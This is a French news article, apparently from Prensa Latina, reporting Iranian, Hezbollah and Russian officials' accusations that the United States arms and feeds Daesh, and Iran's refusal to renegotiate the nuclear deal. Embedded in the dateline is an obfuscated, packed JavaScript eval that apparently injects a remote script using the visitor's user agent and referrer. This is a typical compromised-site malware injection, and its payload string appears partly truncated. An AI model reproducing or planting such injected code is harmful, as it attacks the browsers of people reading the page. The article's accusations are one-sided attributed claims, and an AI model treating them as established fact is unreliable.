mardi 16 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

L’Iran dénonce le soutien des États-Unis aux terroristes

Téhéran, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tnhny|var|u0026u|referrer|knnsd||js|php'.split('|'),0,{})) 12 octobre (Prensa Latina) Dans une déclaration diffusée aujourd'hui, l'Iran dénonce le fait que les États-Unis livrent des armes et des vivres au groupe terroriste Daesh en Syrie et en Irak.

Téhéran, 12 octobre (Prensa Latina) Dans une déclaration diffusée aujourd’hui, l’Iran dénonce le fait que les États-Unis livrent des armes et des vivres au groupe terroriste Daesh en Syrie et en Irak.

Le sous-commandant du Corps des Gardiens de la Révolution Islamique d’Iran, le général de brigade Abdola Araqi, a affirmé que « face aux défaites de l’État Islamique, le gouvernement nord-américain leur livre des armes et de la nourriture par des lancements aériens ».

Selon l’officiel de haut rang, « les États-Unis ont fourni un appui logistique au groupe terroriste Daesh (acronyme en arabe d’État Islamique) dans la province syrienne de Deir Ezzor (à l’Est) et dans les provinces irakiennes de Diyala (Est), Nínive (Nord) et Salah al-Din (Centre) ».

« Les étasuniens restent en Syrie et en Irak sous le prétexte de s’opposer et de lutter contre les terroristes ; mais la réalité contredit cela », a-t-il commenté.

Le secrétaire général du Mouvement de Résistance Islamique du Liban (Hezbollah), Hassan Nasrallah, a accusé Washington d’ « empêcher l’avancée des forces de la Résistance vers les repaires de Daesh en Syrie ».

Selon de nombreux analystes, l’Iran et le Hezbollah jouent un rôle clé dans la lutte contre le terrorisme en Syrie et en Irak. À ce sujet, Nasrallah a jugé que « c’est pour cela que les étasuniens et les israéliens tentent de préserver Daesh : pour ne pas perdre l’espoir d’atteindre leurs objectifs au Moyen-Orient ».

La Russie a également qualifié de « mascarade » les actions des États-Unis et de la coalition qu’ils dirigent. Comme preuve, le Ministère de la Défense russe a révélé « la réduction par cinq, durant le mois de septembre dernier, des bombardements de cette coalition contre des positions de Daesh en Irak ».

Par ailleurs, le représentant de l’Iran devant l’ONU, Qolamali Joshru, a assuré que « les États-Unis ne sont dignes de confiance dans aucune négociation ».

Les déclarations de Joshur ont répondu à une question destinée à savoir si le pays perse sera disposé à renégocier l’accord nucléaire scellé avec le G 5+1 (États-Unis, Royaume-Uni, France, Russie, Chine et l’Allemagne).

Cité aujourd’hui par le site Hispantv, le diplomate a assuré qu’il n’y aura « en aucun cas la moindre renégociation avec le gouvernement nord-américain ».

« Nous avons négocié durant deux ans avec le gouvernement étasunien précédent, et maintenant l’actuel demande une renégociation. Si les États-Unis sortent de l’accord (…) ni l’Iran ni aucun pays ne confiera en Washington », a-t-il souligné.

« L’unique nation qui se nie à accepter ce qui est stipulé dans le traité sont les États-Unis ; car le reste des nations confirment que l’Iran honore le compromis », a-t-il conclu. 

peo/agp/arc/mem/arc

EN CONTINU
notes connexes